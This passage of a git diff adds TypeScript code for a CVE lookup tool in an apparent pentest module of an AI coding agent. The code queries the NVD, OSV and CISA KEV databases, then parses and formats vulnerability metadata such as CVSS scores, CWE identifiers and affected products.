+            scope: cvssData.scope as CVETypes.CVSSv3["scope"],
+            confidentialityImpact: cvssData.confidentialityImpact as CVETypes.CVSSv3["confidentialityImpact"],
+            integrityImpact: cvssData.integrityImpact as CVETypes.CVSSv3["integrityImpact"],
+            availabilityImpact: cvssData.availabilityImpact as CVETypes.CVSSv3["availabilityImpact"],
+          }
+        }
+      } else if (metrics?.cvssMetricV30?.[0]) {
+        const m = metrics.cvssMetricV30[0] as Record<string, unknown>
+        const cvssData = m.cvssData as Record<string, unknown>
+        if (cvssData) {
+          cvss.v3 = {
+            version: "3.0",
+            score: (cvssData.baseScore as number) || 0,
+            vector: (cvssData.vectorString as string) || "",
+            severity: mapSeverity((cvssData.baseSeverity as string) || ""),
+          }
+        }
+      }
+
+      if (metrics?.cvssMetricV2?.[0]) {
+        const m = metrics.cvssMetricV2[0] as Record<string, unknown>
+        const cvssData = m.cvssData as Record<string, unknown>
+        if (cvssData) {
+          cvss.v2 = {
+            version: "2.0",
+            score: (cvssData.baseScore as number) || 0,
+            vector: (cvssData.vectorString as string) || "",
+          }
+        }
+      }
+
+      // Extract CWE
+      const weaknesses = (cveData.weaknesses || []) as { description: { lang: string; value: string }[] }[]
+      const cwe: CVETypes.CWE[] = []
+      for (const w of weaknesses) {
+        for (const d of w.description || []) {
+          if (d.value?.startsWith("CWE-")) {
+            cwe.push({ id: d.value })
+          }
+        }
+      }
+
+      // Extract references
+      const refs = (cveData.references || []) as { url: string; source?: string; tags?: string[] }[]
+      const references: CVETypes.CVEReference[] = refs.map((r) => ({
+        url: r.url,
+        source: r.source,
+        tags: r.tags,
+      }))
+
+      // Extract configurations (affected products)
+      const configurations = (cveData.configurations || []) as Record<string, unknown>[]
+      const affected: CVETypes.AffectedProduct[] = []
+      for (const config of configurations) {
+        const nodes = (config.nodes || []) as Record<string, unknown>[]
+        for (const node of nodes) {
+          const cpeMatch = (node.cpeMatch || []) as Record<string, unknown>[]
+          for (const match of cpeMatch) {
+            const cpe = match.criteria as string
+            if (cpe) {
+              const parts = cpe.split(":")
+              if (parts.length >= 5) {
+                affected.push({
+                  vendor: parts[3] || "unknown",
+                  product: parts[4] || "unknown",
+                  cpe,
+                  versionStartIncluding: match.versionStartIncluding as string | undefined,
+                  versionEndExcluding: match.versionEndExcluding as string | undefined,
+                  versionEndIncluding: match.versionEndIncluding as string | undefined,
+                })
+              }
+            }
+          }
+        }
+      }
+
+      // Determine overall severity
+      const highestCVSS = CVETypes.getHighestCVSS(cvss)
+      const severity = highestCVSS?.severity || "medium"
+
+      cves.push({
+        id: id as CVETypes.CVEId,
+        description: englishDesc,
+        status: mapStatus((cveData.vulnStatus as string) || ""),
+        cvss,
+        severity,
+        cwe,
+        references,
+        affected,
+        publishedDate: (cveData.published as string) || new Date().toISOString(),
+        lastModifiedDate: (cveData.lastModified as string) || new Date().toISOString(),
+        source: "nvd",
+        fetchedAt: Date.now(),
+      })
+    }
+
+    return cves
+  }
+
+  /**
+   * Parse OSV API response into CVEData
+   */
+  function parseOSVResponse(cveId: string, data: Record<string, unknown>): CVETypes.CVEData | undefined {
+    if (!data.id) return undefined
+
+    const summary = (data.summary as string) || (data.details as string) || ""
+    const severity: CVETypes.Severity = mapSeverity((data.database_specific as Record<string, unknown>)?.severity as string || "")
+
+    // Extract CVSS from severity array if present
+    const cvss: CVETypes.CVSS = {}
+    const severityArr = data.severity as { type: string; score: string }[] | undefined
+    if (severityArr) {
+      for (const s of severityArr) {
+        if (s.type === "CVSS_V3" && s.score) {
+          const score = parseFloat(s.score.split("/")[0]) || 0
+          cvss.v3 = {
+            version: "3.1",
+            score,
+            vector: s.score,
+            severity: CVETypes.severityFromScore(score),
+          }
+        }
+      }
+    }
+
+    // Extract affected packages
+    const affected: CVETypes.AffectedProduct[] = []
+    const affectedArr = data.affected as Record<string, unknown>[] | undefined
+    if (affectedArr) {
+      for (const a of affectedArr) {
+        const pkg = a.package as { name: string; ecosystem: string } | undefined
+        if (pkg) {
+          const versions = ((a.versions as string[]) || []).slice(0, 10) // Limit versions
+          affected.push({
+            vendor: pkg.ecosystem || "unknown",
+            product: pkg.name || "unknown",
+            versions,
+          })
+        }
+      }
+    }
+
+    // Extract references
+    const references: CVETypes.CVEReference[] = []
+    const refs = data.references as { type: string; url: string }[] | undefined
+    if (refs) {
+      for (const r of refs) {
+        references.push({
+          url: r.url,
+          tags: [r.type],
+        })
+      }
+    }
+
+    // Extract CWE
+    const cwe: CVETypes.CWE[] = []
+    const aliases = data.aliases as string[] | undefined
+    if (aliases) {
+      for (const alias of aliases) {
+        if (alias.startsWith("CWE-")) {
+          cwe.push({ id: alias })
+        }
+      }
+    }
+
+    return {
+      id: cveId as CVETypes.CVEId,
+      description: summary,
+      cvss,
+      severity: cvss.v3?.severity || severity || "medium",
+      cwe,
+      references,
+      affected,
+      publishedDate: (data.published as string) || new Date().toISOString(),
+      lastModifiedDate: (data.modified as string) || new Date().toISOString(),
+      source: "osv",
+      fetchedAt: Date.now(),
+    }
+  }
+
+  /**
+   * Ensure KEV cache is populated
+   */
+  async function ensureKEVCache(config: LookupConfig): Promise<void> {
+    if (kevCache && Date.now() - kevLastFetched < KEV_CACHE_TTL) {
+      return
+    }
+
+    try {
+      const timeout = config.timeout ?? DEFAULT_TIMEOUT
+      const controller = new AbortController()
+      const timeoutId = setTimeout(() => controller.abort(), timeout)
+
+      const response = await fetch(CISA_KEV_URL, {
+        headers: { Accept: "application/json" },
+        signal: controller.signal,
+      })
+
+      clearTimeout(timeoutId)
+
+      if (!response.ok) {
+        log.warn("Failed to fetch CISA KEV", { status: response.status })
+        return
+      }
+
+      const data = await response.json()
+      const vulnerabilities = (data.vulnerabilities || []) as Record<string, unknown>[]
+
+      kevCache = new Map()
+      for (const vuln of vulnerabilities) {
+        const cveId = vuln.cveID as string
+        if (cveId) {
+          const entry: CVETypes.KEVEntry = {
+            cveId: cveId as CVETypes.CVEId,
+            vendorProject: (vuln.vendorProject as string) || "",
+            product: (vuln.product as string) || "",
+            vulnerabilityName: (vuln.vulnerabilityName as string) || "",
+            dateAdded: (vuln.dateAdded as string) || "",
+            shortDescription: (vuln.shortDescription as string) || "",
+            requiredAction: (vuln.requiredAction as string) || "",
+            dueDate: (vuln.dueDate as string) || "",
+            knownRansomwareCampaignUse: (vuln.knownRansomwareCampaignUse as "Known" | "Unknown") || "Unknown",
+            notes: vuln.notes as string | undefined,
+          }
+          kevCache.set(cveId.toUpperCase(), entry)
+        }
+      }
+
+      kevLastFetched = Date.now()
+      log.info("CISA KEV cache updated", { entries: kevCache.size })
+    } catch (error) {
+      log.warn("Failed to update CISA KEV cache", { error })
+    }
+  }
+
+  /**
+   * Update rate limit tracking from response headers
+   */
+  function updateRateLimits(source: CVETypes.APISource, response: Response): void {
+    const remaining = response.headers.get("X-RateLimit-Remaining")
+    const limit = response.headers.get("X-RateLimit-Limit")
+    const reset = response.headers.get("X-RateLimit-Reset")
+    const retryAfter = response.headers.get("Retry-After")
+
+    if (remaining || limit) {
+      rateLimits[source] = {
+        remaining: remaining ? parseInt(remaining, 10) : 0,
+        limit: limit ? parseInt(limit, 10) : 0,
+        resetAt: reset ? parseInt(reset, 10) * 1000 : Date.now() + 30000,
+        retryAfter: retryAfter ? parseInt(retryAfter, 10) : undefined,
+      }
+    }
+  }
+
+  /**
+   * Map severity string to enum
+   */
+  function mapSeverity(severity: string): CVETypes.Severity {
+    const normalized = severity.toUpperCase()
+    switch (normalized) {
+      case "CRITICAL":
+        return "critical"
+      case "HIGH":
+        return "high"
+      case "MEDIUM":
+        return "medium"
+      case "LOW":
+        return "low"
+      case "NONE":
+        return "none"
+      default:
+        return "medium"
+    }
+  }
+
+  /**
+   * Map NVD status string to enum
+   */
+  function mapStatus(status: string): CVETypes.CVEStatus {
+    const normalized = status.toLowerCase().replace(/\s+/g, "_")
+    switch (normalized) {
+      case "analyzed":
+        return "analyzed"
+      case "awaiting_analysis":
+        return "awaiting_analysis"
+      case "modified":
+        return "modified"
+      case "rejected":
+        return "rejected"
+      case "received":
+        return "received"
+      default:
+        return "received"
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/cve/tool.ts b/packages/opencode/src/pentest/cve/tool.ts
new file mode 100644
index 00000000000..d1461db04b0
--- /dev/null
+++ b/packages/opencode/src/pentest/cve/tool.ts
@@ -0,0 +1,587 @@
+/**
+ * @fileoverview CVE Lookup Tool
+ *
+ * Agent tool for CVE lookup, search, and enrichment.
+ * Integrates with NVD, OSV, and CISA KEV databases.
+ *
+ * @module pentest/cve/tool
+ */
+
+import z from "zod"
+import { Tool } from "../../tool/tool"
+import { CVETypes } from "./types"
+import { CVELookup } from "./lookup"
+import { CVECache } from "./cache"
+import { CVEEnricher } from "./enricher"
+
+/**
+ * CVE Lookup Tool for vulnerability research and enrichment.
+ *
+ * Provides CVE lookup, search, and finding enrichment capabilities.
+ */
+export const CVETool = Tool.define("cve", async () => {
+  return {
+    description: `CVE vulnerability lookup and enrichment service.
+
+ACTIONS:
+- lookup: Look up a single CVE by ID
+- bulk-lookup: Look up multiple CVEs at once
+- search: Search CVEs by keyword, product, or severity
+- kev-check: Check if CVEs are in CISA Known Exploited Vulnerabilities
+- enrich-findings: Enrich findings with CVE data from external sources
+- cache-stats: Get CVE cache statistics
+- clear-cache: Clear the CVE cache
+
+SOURCES:
+- NVD API 2.0 (NIST National Vulnerability Database)
+- OSV API (Open Source Vulnerabilities)
+- CISA KEV (Known Exploited Vulnerabilities)
+
+EXAMPLES:
+- Lookup CVE: action="lookup", cveId="CVE-2021-44228"
+- Bulk lookup: action="bulk-lookup", cveIds=["CVE-2021-44228", "CVE-2023-4911"]
+- Search: action="search", keyword="log4j"
+- KEV check: action="kev-check", cveIds=["CVE-2021-44228"]
+- Enrich: action="enrich-findings", cveIds=["CVE-2021-44228", "CVE-2023-4911"]`,
+
+    parameters: z.object({
+      action: z
+        .enum(["lookup", "bulk-lookup", "search", "kev-check", "enrich-findings", "cache-stats", "clear-cache"])
+        .describe("Action to perform"),
+
+      // Single CVE lookup
+      cveId: z.string().optional().describe("CVE ID for lookup (e.g., CVE-2021-44228)"),
+
+      // Multiple CVE operations
+      cveIds: z.array(z.string()).optional().describe("List of CVE IDs for bulk operations"),
+
+      // Search options
+      keyword: z.string().optional().describe("Keyword to search for in CVE descriptions"),
+      cpe: z.string().optional().describe("CPE name to filter by (e.g., cpe:2.3:a:apache:log4j:*)"),
+      cwe: z.string().optional().describe("CWE ID to filter by (e.g., CWE-79)"),
+      severity: z.enum(["critical", "high", "medium", "low", "none"]).optional().describe("Minimum severity level"),
+
+      // Date filters
+      publishedAfter: z.string().optional().describe("Find CVEs published after date (ISO format)"),
+      publishedBefore: z.string().optional().describe("Find CVEs published before date (ISO format)"),
+
+      // Pagination
+      limit: z.number().optional().describe("Maximum results (default: 20, max: 100)"),
+      offset: z.number().optional().describe("Offset for pagination (default: 0)"),
+
+      // Options
+      skipCache: z.boolean().optional().describe("Skip cache for fresh data"),
+      nvdApiKey: z.string().optional().describe("NVD API key for higher rate limits"),
+    }),
+
+    async execute(params, ctx) {
+      switch (params.action) {
+        case "lookup":
+          return handleLookup(params, ctx)
+
+        case "bulk-lookup":
+          return handleBulkLookup(params, ctx)
+
+        case "search":
+          return handleSearch(params, ctx)
+
+        case "kev-check":
+          return handleKevCheck(params, ctx)
+
+        case "enrich-findings":
+          return handleEnrichFindings(params, ctx)
+
+        case "cache-stats":
+          return handleCacheStats()
+
+        case "clear-cache":
+          return handleClearCache()
+
+        default:
+          return {
+            title: `Unknown action: ${params.action}`,
+            output: `Unknown action. Use one of: lookup, bulk-lookup, search, kev-check, enrich-findings, cache-stats, clear-cache`,
+            metadata: { action: params.action, status: "error" },
+          }
+      }
+    },
+  }
+})
+
+/**
+ * Handle CVE lookup
+ */
+async function handleLookup(
+  params: {
+    cveId?: string
+    skipCache?: boolean
+    nvdApiKey?: string
+  },
+  ctx: Tool.Context
+): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.cveId) {
+    return {
+      title: "CVE ID required",
+      output: "Please provide a CVE ID (e.g., CVE-2021-44228)",
+      metadata: { action: "lookup", status: "error" },
+    }
+  }
+
+  ctx.metadata({
+    title: `Looking up ${params.cveId}`,
+    metadata: { action: "lookup", cveId: params.cveId, status: "running" },
+  })
+
+  try {
+    const result = await CVELookup.lookup(params.cveId, {
+      skipCache: params.skipCache,
+      nvdApiKey: params.nvdApiKey,
+    })
+
+    if (result.status !== "success" || !result.cve) {
+      return {
+        title: `CVE not found: ${params.cveId}`,
+        output: result.error || `CVE ${params.cveId} was not found in NVD or OSV databases.`,
+        metadata: {
+          action: "lookup",
+          cveId: params.cveId,
+          status: result.status,
+          cached: result.cached,
+          responseTime: result.responseTime,
+        },
+      }
+    }
+
+    const cve = result.cve
+    const output = CVEEnricher.formatCVE(cve)
+
+    return {
+      title: `${cve.id} - ${cve.severity.toUpperCase()}`,
+      output,
+      metadata: {
+        action: "lookup",
+        cveId: cve.id,
+        severity: cve.severity,
+        status: "success",
+        source: result.source,
+        cached: result.cached,
+        responseTime: result.responseTime,
+        cvss: CVETypes.getHighestCVSS(cve.cvss),
+        cwe: cve.cwe.map((c) => c.id),
+        inKEV: cve.exploitability?.inKEV || false,
+        hasExploit: cve.exploitability?.hasPublicExploit || false,
+        affectedProducts: cve.affected.length,
+        references: cve.references.length,
+      },
+    }
+  } catch (error) {
+    return {
+      title: `Lookup failed: ${params.cveId}`,
+      output: error instanceof Error ? error.message : String(error),
+      metadata: { action: "lookup", cveId: params.cveId, status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle bulk CVE lookup
+ */
+async function handleBulkLookup(
+  params: {
+    cveIds?: string[]
+    skipCache?: boolean
+    nvdApiKey?: string
+  },
+  ctx: Tool.Context
+): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.cveIds || params.cveIds.length === 0) {
+    return {
+      title: "CVE IDs required",
+      output: "Please provide an array of CVE IDs",
+      metadata: { action: "bulk-lookup", status: "error" },
+    }
+  }
+
+  ctx.metadata({
+    title: `Looking up ${params.cveIds.length} CVEs`,
+    metadata: { action: "bulk-lookup", count: params.cveIds.length, status: "running" },
+  })
+
+  try {
+    const result = await CVELookup.bulkLookup(params.cveIds, {
+      skipCache: params.skipCache,
+      nvdApiKey: params.nvdApiKey,
+    })
+
+    const lines: string[] = [`## Bulk CVE Lookup Results`, ``, `Total: ${result.stats.total} | Found: ${result.stats.found} | Not Found: ${result.stats.notFound} | Cached: ${result.stats.cached}`, ``]
+
+    // Group by severity
+    const found = result.results.filter((r) => r.status === "success" && r.cve)
+    const cves = found.map((r) => r.cve!).sort((a, b) => {
+      const order = { critical: 0, high: 1, medium: 2, low: 3, none: 4 }
+      return order[a.severity] - order[b.severity]
+    })
+
+    for (const cve of cves) {
+      const cvss = CVETypes.getHighestCVSS(cve.cvss)
+      const kevTag = cve.exploitability?.inKEV ? " [KEV]" : ""
+      const exploitTag = cve.exploitability?.hasPublicExploit ? " [EXPLOIT]" : ""
+      lines.push(`- **${cve.id}** (${cve.severity.toUpperCase()}, CVSS: ${cvss?.score || "N/A"})${kevTag}${exploitTag}`)
+      lines.push(`  ${truncate(cve.description, 150)}`)
+    }
+
+    // Not found
+    const notFound = result.results.filter((r) => r.status === "not_found")
+    if (notFound.length > 0) {
+      lines.push(``, `### Not Found`)
+      for (const r of notFound) {
+        const cveId = params.cveIds[result.results.indexOf(r)]
+        lines.push(`- ${cveId}`)
+      }
+    }
+
+    return {
+      title: `Bulk lookup: ${result.stats.found}/${result.stats.total} found`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "bulk-lookup",
+        status: "success",
+        stats: result.stats,
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Bulk lookup failed",
+      output: error instanceof Error ? error.message : String(error),
+      metadata: { action: "bulk-lookup", status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle CVE search
+ */
+async function handleSearch(
+  params: {
+    keyword?: string
+    cpe?: string
+    cwe?: string
+    severity?: CVETypes.Severity
+    publishedAfter?: string
+    publishedBefore?: string
+    limit?: number
+    offset?: number
+    nvdApiKey?: string
+  },
+  ctx: Tool.Context
+): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.keyword && !params.cpe && !params.cwe && !params.severity) {
+    return {
+      title: "Search criteria required",
+      output: "Please provide at least one of: keyword, cpe, cwe, or severity",
+      metadata: { action: "search", status: "error" },
+    }
+  }
+
+  const searchDesc = params.keyword || params.cpe || params.cwe || params.severity || "custom"
+
+  ctx.metadata({
+    title: `Searching CVEs: ${searchDesc}`,
+    metadata: { action: "search", criteria: searchDesc, status: "running" },
+  })
+
+  try {
+    const result = await CVELookup.search(
+      {
+        keyword: params.keyword,
+        cpe: params.cpe,
+        cwe: params.cwe,
+        cvssV3Severity: params.severity,
+        publishedStartDate: params.publishedAfter,
+        publishedEndDate: params.publishedBefore,
+        limit: params.limit || 20,
+        offset: params.offset || 0,
+      },
+      { nvdApiKey: params.nvdApiKey }
+    )
+
+    const lines: string[] = [
+      `## CVE Search Results`,
+      ``,
+      `Query: ${params.keyword || params.cpe || params.cwe || ""}`,
+      `Results: ${result.cves.length} of ${result.totalResults} total`,
+      ``,
+    ]
+
+    for (const cve of result.cves) {
+      const cvss = CVETypes.getHighestCVSS(cve.cvss)
+      lines.push(`### ${cve.id} - ${cve.severity.toUpperCase()}`)
+      lines.push(`CVSS: ${cvss?.score || "N/A"} | Published: ${cve.publishedDate.split("T")[0]}`)
+      lines.push(`${truncate(cve.description, 300)}`)
+      lines.push(``)
+    }
+
+    if (result.totalResults > result.cves.length + (params.offset || 0)) {
+      lines.push(`*Use offset=${(params.offset || 0) + result.cves.length} to see more results*`)
+    }
+
+    return {
+      title: `Found ${result.totalResults} CVEs`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "search",
+        status: "success",
+        totalResults: result.totalResults,
+        returned: result.cves.length,
+        startIndex: result.startIndex,
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Search failed",
+      output: error instanceof Error ? error.message : String(error),
+      metadata: { action: "search", status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle KEV check
+ */
+async function handleKevCheck(
+  params: {
+    cveIds?: string[]
+  },
+  ctx: Tool.Context
+): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.cveIds || params.cveIds.length === 0) {
+    return {
+      title: "CVE IDs required",
+      output: "Please provide an array of CVE IDs to check against CISA KEV",
+      metadata: { action: "kev-check", status: "error" },
+    }
+  }
+
+  ctx.metadata({
+    title: `Checking ${params.cveIds.length} CVEs against KEV`,
+    metadata: { action: "kev-check", count: params.cveIds.length, status: "running" },
+  })
+
+  try {
+    const results = await CVELookup.kevCheck(params.cveIds, {})
+
+    const inKev = results.filter((r) => r.inKEV)
+    const notInKev = results.filter((r) => !r.inKEV)
+
+    const lines: string[] = [`## CISA Known Exploited Vulnerabilities Check`, ``, `Checked: ${params.cveIds.length} | In KEV: ${inKev.length} | Not in KEV: ${notInKev.length}`, ``]
+
+    if (inKev.length > 0) {
+      lines.push(`### In CISA KEV (${inKev.length})`)
+      lines.push(`These vulnerabilities are actively exploited and should be prioritized:`)
+      lines.push(``)
+      for (const r of inKev) {
+        if (r.entry) {
+          lines.push(`- **${r.cveId}**: ${r.entry.vulnerabilityName}`)
+          lines.push(`  Due Date: ${r.entry.dueDate} | Ransomware: ${r.entry.knownRansomwareCampaignUse}`)
+          lines.push(`  Action: ${truncate(r.entry.requiredAction, 100)}`)
+        } else {
+          lines.push(`- **${r.cveId}**: In KEV`)
+        }
+      }
+      lines.push(``)
+    }
+
+    if (notInKev.length > 0) {
+      lines.push(`### Not in CISA KEV (${notInKev.length})`)
+      for (const r of notInKev) {
+        lines.push(`- ${r.cveId}`)
+      }
+    }
+
+    return {
+      title: `KEV check: ${inKev.length}/${params.cveIds.length} in KEV`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "kev-check",
+        status: "success",
+        total: params.cveIds.length,
+        inKEV: inKev.length,
+        kevCVEs: inKev.map((r) => r.cveId),
+      },
+    }
+  } catch (error) {
+    return {
+      title: "KEV check failed",
+      output: error instanceof Error ? error.message : String(error),
+      metadata: { action: "kev-check", status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle finding enrichment
+ */
+async function handleEnrichFindings(
+  params: {
+    cveIds?: string[]
+    skipCache?: boolean
+    nvdApiKey?: string
+  },
+  ctx: Tool.Context
+): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.cveIds || params.cveIds.length === 0) {
+    return {
+      title: "CVE IDs required",
+      output: "Please provide an array of CVE IDs to enrich",
+      metadata: { action: "enrich-findings", status: "error" },
+    }
+  }
+
+  ctx.metadata({
+    title: `Enriching ${params.cveIds.length} CVEs`,
+    metadata: { action: "enrich-findings", count: params.cveIds.length, status: "running" },
+  })
+
+  try {
+    const inputs = params.cveIds.map((id) => CVEEnricher.createInput(id))
+    const results = await CVEEnricher.enrichMany(inputs, {
+      skipCache: params.skipCache,
+      nvdApiKey: params.nvdApiKey,
+      checkKEV: true,
+      addExploitInfo: true,
+    })
+
+    const summary = CVEEnricher.summarize(results)
+
+    const lines: string[] = [
+      `## CVE Enrichment Results`,
+      ``,
+      `Total: ${summary.total} | Enriched: ${summary.enriched} | Failed: ${summary.failed}`,
+      `In KEV: ${summary.inKEV} | Has Exploit: ${summary.hasExploit}`,
+      ``,
+      `### By Severity`,
+      `- Critical: ${summary.bySeverity.critical}`,
+      `- High: ${summary.bySeverity.high}`,
+      `- Medium: ${summary.bySeverity.medium}`,
+      `- Low: ${summary.bySeverity.low}`,
+      ``,
+    ]
+
+    // Show enriched CVEs
+    const enriched = results.filter((r) => r.enriched && r.data)
+    for (const r of enriched) {
+      lines.push(CVEEnricher.formatCVE(r.data!))
+      lines.push(``)
+    }
+
+    // Show failed
+    const failed = results.filter((r) => !r.enriched)
+    if (failed.length > 0) {
+      lines.push(`### Failed to Enrich`)
+      for (const r of failed) {
+        lines.push(`- ${r.cveId}: ${r.error || "Unknown error"}`)
+      }
+    }
+
+    return {
+      title: `Enriched ${summary.enriched}/${summary.total} CVEs`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "enrich-findings",
+        status: "success",
+        summary,
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Enrichment failed",
+      output: error instanceof Error ? error.message : String(error),
+      metadata: { action: "enrich-findings", status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle cache stats
+ */
+async function handleCacheStats(): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  try {
+    const stats = await CVECache.stats()
+
+    const lines: string[] = [
+      `## CVE Cache Statistics`,
+      ``,
+      `Entries: ${stats.entries}`,
+      `Size: ${formatBytes(stats.size)}`,
+      `Hits: ${stats.hits}`,
+      `Misses: ${stats.misses}`,
+      `Hit Rate: ${stats.hits + stats.misses > 0 ? ((stats.hits / (stats.hits + stats.misses)) * 100).toFixed(1) : 0}%`,
+      ``,
+    ]
+
+    if (stats.oldestEntry) {
+      lines.push(`Oldest Entry: ${new Date(stats.oldestEntry).toISOString()}`)
+    }
+    if (stats.newestEntry) {
+      lines.push(`Newest Entry: ${new Date(stats.newestEntry).toISOString()}`)
+    }
+
+    return {
+      title: `CVE Cache: ${stats.entries} entries`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "cache-stats",
+        status: "success",
+        stats,
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Failed to get cache stats",
+      output: error instanceof Error ? error.message : String(error),
+      metadata: { action: "cache-stats", status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle cache clear
+ */
+async function handleClearCache(): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  try {
+    const count = await CVECache.clear()
+
+    return {
+      title: `Cleared ${count} CVE cache entries`,
+      output: `Successfully cleared ${count} entries from the CVE cache.`,
+      metadata: {
+        action: "clear-cache",
+        status: "success",
+        entriesCleared: count,
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Failed to clear cache",
+      output: error instanceof Error ? error.message : String(error),
+      metadata: { action: "clear-cache", status: "error" },
+    }
+  }
+}
+
+/**
+ * Truncate string
+ */
+function truncate(str: string, maxLength: number): string {
+  if (str.length <= maxLength) return str
+  return str.slice(0, maxLength - 3) + "..."
+}
+
+/**
+ * Format bytes
+ */
+function formatBytes(bytes: number): string {
+  if (bytes < 1024) return `${bytes} B`
+  if (bytes < 1024 * 1024) return `${(bytes / 1024).toFixed(1)} KB`
+  return `${(bytes / (1024 * 1024)).toFixed(1)} MB`
+}
diff --git a/packages/opencode/src/pentest/cve/types.ts b/packages/opencode/src/pentest/cve/types.ts
new file mode 100644
index 00000000000..e0e06c0a1c4
--- /dev/null
+++ b/packages/opencode/src/pentest/cve/types.ts
@@ -0,0 +1,360 @@
+/**
+ * @fileoverview CVE Lookup Service Types
+ *
+ * Zod schemas for CVE data structures including:
+ * - CVE identifiers and data
+ * - CVSS scoring (v2, v3, v4)
+ * - CISA KEV data
+ * - CVE search and enrichment
+ *
+ * @module pentest/cve/types
+ */
+
+import z from "zod"
+
+export namespace CVETypes {
+  /**
+   * CVE ID pattern (CVE-YYYY-NNNNN)
+   */
+  export const CVEId = z.string().regex(/^CVE-\d{4}-\d{4,}$/, "Invalid CVE ID format")
+  export type CVEId = z.infer<typeof CVEId>
+
+  /**
+   * CVSS severity levels
+   */
+  export const Severity = z.enum(["none", "low", "medium", "high", "critical"])
+  export type Severity = z.infer<typeof Severity>
+
+  /**
+   * CVE status
+   */
+  export const CVEStatus = z.enum(["analyzed", "awaiting_analysis", "modified", "rejected", "received"])
+  export type CVEStatus = z.infer<typeof CVEStatus>
+
+  /**
+   * Lookup status
+   */
+  export const LookupStatus = z.enum(["success", "not_found", "error", "rate_limited"])
+  export type LookupStatus = z.infer<typeof LookupStatus>
+
+  /**
+   * API sources for CVE data
+   */
+  export const APISource = z.enum(["nvd", "osv", "cisa_kev", "cache"])
+  export type APISource = z.infer<typeof APISource>
+
+  /**
+   * CVSS v2 metrics
+   */
+  export const CVSSv2 = z.object({
+    version: z.literal("2.0"),
+    score: z.number().min(0).max(10),
+    vector: z.string(),
+    accessVector: z.enum(["NETWORK", "ADJACENT_NETWORK", "LOCAL"]).optional(),
+    accessComplexity: z.enum(["LOW", "MEDIUM", "HIGH"]).optional(),
+    authentication: z.enum(["NONE", "SINGLE", "MULTIPLE"]).optional(),
+    confidentialityImpact: z.enum(["NONE", "PARTIAL", "COMPLETE"]).optional(),
+    integrityImpact: z.enum(["NONE", "PARTIAL", "COMPLETE"]).optional(),
+    availabilityImpact: z.enum(["NONE", "PARTIAL", "COMPLETE"]).optional(),
+  })
+  export type CVSSv2 = z.infer<typeof CVSSv2>
+
+  /**
+   * CVSS v3.x metrics
+   */
+  export const CVSSv3 = z.object({
+    version: z.enum(["3.0", "3.1"]),
+    score: z.number().min(0).max(10),
+    vector: z.string(),
+    severity: Severity,
+    attackVector: z.enum(["NETWORK", "ADJACENT_NETWORK", "LOCAL", "PHYSICAL"]).optional(),
+    attackComplexity: z.enum(["LOW", "HIGH"]).optional(),
+    privilegesRequired: z.enum(["NONE", "LOW", "HIGH"]).optional(),
+    userInteraction: z.enum(["NONE", "REQUIRED"]).optional(),
+    scope: z.enum(["UNCHANGED", "CHANGED"]).optional(),
+    confidentialityImpact: z.enum(["NONE", "LOW", "HIGH"]).optional(),
+    integrityImpact: z.enum(["NONE", "LOW", "HIGH"]).optional(),
+    availabilityImpact: z.enum(["NONE", "LOW", "HIGH"]).optional(),
+  })
+  export type CVSSv3 = z.infer<typeof CVSSv3>
+
+  /**
+   * CVSS v4.0 metrics
+   */
+  export const CVSSv4 = z.object({
+    version: z.literal("4.0"),
+    score: z.number().min(0).max(10),
+    vector: z.string(),
+    severity: Severity,
+    attackVector: z.enum(["NETWORK", "ADJACENT", "LOCAL", "PHYSICAL"]).optional(),
+    attackComplexity: z.enum(["LOW", "HIGH"]).optional(),
+    attackRequirements: z.enum(["NONE", "PRESENT"]).optional(),
+    privilegesRequired: z.enum(["NONE", "LOW", "HIGH"]).optional(),
+    userInteraction: z.enum(["NONE", "PASSIVE", "ACTIVE"]).optional(),
+  })
+  export type CVSSv4 = z.infer<typeof CVSSv4>
+
+  /**
+   * Combined CVSS data
+   */
+  export const CVSS = z.object({
+    v2: CVSSv2.optional(),
+    v3: CVSSv3.optional(),
+    v4: CVSSv4.optional(),
+  })
+  export type CVSS = z.infer<typeof CVSS>
+
+  /**
+   * CWE reference
+   */
+  export const CWE = z.object({
+    id: z.string().regex(/^CWE-\d+$/),
+    name: z.string().optional(),
+    description: z.string().optional(),
+  })
+  export type CWE = z.infer<typeof CWE>
+
+  /**
+   * CVE reference link
+   */
+  export const CVEReference = z.object({
+    url: z.string().url(),
+    source: z.string().optional(),
+    tags: z.array(z.string()).optional(),
+  })
+  export type CVEReference = z.infer<typeof CVEReference>
+
+  /**
+   * Affected product/version
+   */
+  export const AffectedProduct = z.object({
+    vendor: z.string(),
+    product: z.string(),
+    versions: z.array(z.string()).optional(),
+    versionStartIncluding: z.string().optional(),
+    versionEndExcluding: z.string().optional(),
+    versionEndIncluding: z.string().optional(),
+    cpe: z.string().optional(),
+  })
+  export type AffectedProduct = z.infer<typeof AffectedProduct>
+
+  /**
+   * Exploitability information
+   */
+  export const Exploitability = z.object({
+    inKEV: z.boolean().default(false),
+    kevDueDate: z.string().optional(),
+    kevDateAdded: z.string().optional(),
+    hasPublicExploit: z.boolean().default(false),
+    exploitMaturity: z.enum(["unproven", "proof_of_concept", "functional", "high"]).optional(),
+    exploitReferences: z.array(z.string()).optional(),
+  })
+  export type Exploitability = z.infer<typeof Exploitability>
